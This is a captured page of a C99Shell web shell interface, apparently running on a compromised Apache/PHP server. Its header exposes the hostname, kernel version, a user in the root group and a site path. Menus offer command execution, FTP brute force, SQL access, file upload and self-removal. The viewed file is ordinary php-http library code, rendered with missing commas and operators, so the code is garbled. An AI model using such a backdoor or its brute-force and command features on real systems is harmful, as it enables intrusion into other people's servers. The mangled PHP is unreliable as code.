!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/php-http/client-common/src/Plugin/   drwxr-xr-x
Free 29.08 GB of 117.98 GB (24.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SeekableBodyPlugin.php (1.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Http\Client\Common\Plugin;

use 
Http\Client\Common\Plugin;
use 
Symfony\Component\OptionsResolver\OptionsResolver;

/**
 * @internal
 */
abstract class SeekableBodyPlugin implements Plugin
{
    
/**
     * @var bool
     */
    
protected $useFileBuffer;

    
/**
     * @var int
     */
    
protected $memoryBufferSize;

    
/**
     * @param array{'use_file_buffer'?: bool, 'memory_boffer_size'?: int} $config
     *
     * Configuration options:
     *   - use_file_buffer: Whether this plugin should use a file as a buffer if the stream is too big, defaults to true
     *   - memory_buffer_size: Max memory size in bytes to use for the buffer before it use a file, defaults to 2097152 (2 mb)
     */
    
public function __construct(array $config = [])
    {
        
$resolver = new OptionsResolver();
        
$resolver->setDefaults([
            
'use_file_buffer' => true,
            
'memory_buffer_size' => 2097152,
        ]);
        
$resolver->setAllowedTypes('use_file_buffer''bool');
        
$resolver->setAllowedTypes('memory_buffer_size''int');

        
$options $resolver->resolve($config);

        
$this->useFileBuffer $options['use_file_buffer'];
        
$this->memoryBufferSize $options['memory_buffer_size'];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--